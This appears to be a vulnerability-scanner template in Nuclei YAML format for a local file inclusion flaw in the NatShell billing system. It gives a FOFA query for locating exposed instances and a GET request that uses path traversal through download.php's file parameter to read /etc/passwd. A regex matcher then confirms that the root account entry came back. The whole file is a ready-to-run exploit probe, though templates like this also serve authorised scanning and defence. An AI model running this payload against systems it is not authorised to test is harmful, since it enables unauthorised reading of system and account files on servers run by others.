id: natshell-path-traversal

info:
  name: NatShell - Local File Inclusion
  author: pikpikcu
  severity: high
  description: NatShell is vulnerable to local file inclusion.
  reference:
    - https://mp.weixin.qq.com/s/g4YNI6UBqIQcKL0TRkKWlw
  classification:
    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
    cvss-score: 7.5
    cwe-id: CWE-22
  metadata:
    fofa-query: title="蓝海卓越计费管理系统"
  tags: natshell,lfi

requests:
  - method: GET
    path:
      - "{{BaseURL}}/download.php?file=../../../../../etc/passwd"

    matchers-condition: and
    matchers:

      - type: regex
        regex:
          - "toor:[x*]:0:0"

      - type: status
        status:
          - 200

# Enhanced by mp on 2022/07/27
